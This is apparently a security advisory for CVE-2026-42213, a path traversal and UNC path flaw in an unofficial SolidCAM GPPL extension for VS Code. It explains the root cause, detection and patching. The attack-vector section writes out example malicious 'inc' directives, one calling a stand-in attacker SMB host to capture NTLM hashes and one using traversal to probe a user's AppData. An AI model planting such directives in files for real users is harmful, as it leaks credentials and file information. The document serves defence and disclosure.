CVE-2026-42213 Overview
CVE-2026-42213 affects SolidCAM-GPPL-IDE, an unofficial, independently developed Visual Studio Code extension that provides a Postprocessor IDE for SolidCAM. The vulnerability exists in the GpplDocumentLinkHandler component, which resolves the inc "filename" directive in GPPL postprocessor files into clickable document links. The handler accepts arbitrary paths, including absolute paths, parent-directory traversal sequences (..\..\..\), Universal Naming Convention (UNC) paths (\\server\share\), and arbitrary subfolders. Affected versions span from 1.0.0 to before 1.0.2. The flaw is classified under CWE-22: Improper Limitation of a Pathname to a Restricted Directory.
Critical Impact
A crafted GPPL postprocessor file can probe arbitrary local filesystem paths and trigger outbound Server Message Block (SMB) authentication, leaking NTLM hashes to attacker-controlled servers.
Affected Products
- SolidCAM-GPPL-IDE versions 1.0.0 through 1.0.1
- Visual Studio Code environments with the vulnerable extension installed
- Windows hosts processing untrusted GPPL postprocessor files
Discovery Timeline
- 2026-05-08 - CVE-2026-42213 published to the National Vulnerability Database (NVD)
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-42213
Vulnerability Analysis
The SolidCAM-GPPL-IDE extension implements a textDocument/documentLink provider that scans GPPL postprocessor files for inc "filename" directives. For each directive, GpplDocumentLinkHandler constructs a candidate path and calls File.Exists to determine whether to render a clickable link in the editor.
The handler performs no validation of the supplied filename. Attackers can embed absolute paths, relative paths containing parent-directory segments, or UNC paths pointing to remote SMB shares. Two distinct attack surfaces emerge from this design.
First, the File.Exists probing primitive enables information disclosure. An attacker can enumerate files and directories on the victim's filesystem by observing which links render as active versus broken in the editor view.
Second, UNC path resolution triggers SMB authentication. When the operating system attempts to satisfy File.Exists("\\\\attacker.tld\\share\\probe"), Windows automatically negotiates authentication and transmits the user's NTLMv2 challenge-response hash to the remote server.
Root Cause
The root cause is missing input sanitization on the filename argument of the inc directive. The handler treats user-controlled content from a project file as a trusted path and delegates resolution directly to the .NET framework without normalizing or restricting the path scope to the workspace root.
Attack Vector
Exploitation requires the victim to open a malicious .gpp file in Visual Studio Code with the SolidCAM-GPPL-IDE extension installed. The malicious file contains crafted inc directives such as inc "\\attacker.example.com\share\x" for NTLM relay or inc "..\..\..\Users\victim\AppData\Roaming\target.dat" for file existence probing. No further user interaction beyond opening the file is required for the document link handler to execute. Captured NTLM hashes can be relayed against domain services or subjected to offline cracking.
No verified exploit code is published. See the GitHub Security Advisory GHSA-xvpx-9p39-g62m for technical details.
Detection Methods for CVE-2026-42213
Indicators of Compromise
- Outbound SMB (TCP/445) or NetBIOS (TCP/139) connections from Code.exe or extension host processes to untrusted external hosts
- GPPL files containing inc directives with UNC prefixes (\\), drive letters, or ..\ sequences
- Unexpected file access attempts originating from the Visual Studio Code extension host targeting sensitive paths such as AppData, System32, or user profile directories
Detection Strategies
- Inspect .gpp and related postprocessor files in source repositories for inc directives referencing paths outside the project workspace
- Alert on Visual Studio Code processes initiating SMB authentication to non-corporate IP ranges
- Hunt for the SolidCAM-GPPL-IDE extension at versions below 1.0.2 across managed Windows endpoints
Monitoring Recommendations
- Enable Windows Security event ID 4624/4625 logging to capture NTLM authentication attempts from developer workstations
- Monitor egress firewall logs for outbound TCP/445 traffic, which should generally be blocked at the perimeter
- Track endpoint telemetry for File.Exists style probing patterns from editor processes against sensitive directories
How to Mitigate CVE-2026-42213
Immediate Actions Required
- Upgrade SolidCAM-GPPL-IDE to version 1.0.2 or later on all developer endpoints
- Block outbound SMB traffic (TCP/445 and TCP/139) at the network perimeter to prevent NTLM hash exfiltration
- Audit existing GPPL postprocessor files for malicious inc directives before opening them in the editor
Patch Information
The vulnerability is patched in SolidCAM-GPPL-IDE version 1.0.2. The fix is published in GitHub Release v1.0.2 and implemented in commit 9d0ba80. The patched handler restricts path resolution and rejects UNC and parent-directory traversal sequences.
Workarounds
- Uninstall or disable the SolidCAM-GPPL-IDE extension until the upgrade to 1.0.2 is applied
- Configure Windows Group Policy to restrict outgoing NTLM authentication to remote servers via the Network security: Restrict NTLM policies
- Open untrusted GPPL files only in sandboxed virtual machines isolated from corporate networks and credentials
# Configuration example - restrict outbound SMB and NTLM
# Block outbound SMB at Windows Firewall
New-NetFirewallRule -DisplayName "Block Outbound SMB" -Direction Outbound -Protocol TCP -RemotePort 445,139 -Action Block
# Restrict outgoing NTLM authentication (Group Policy)
# Computer Configuration > Windows Settings > Security Settings >
# Local Policies > Security Options >
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = Deny all
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
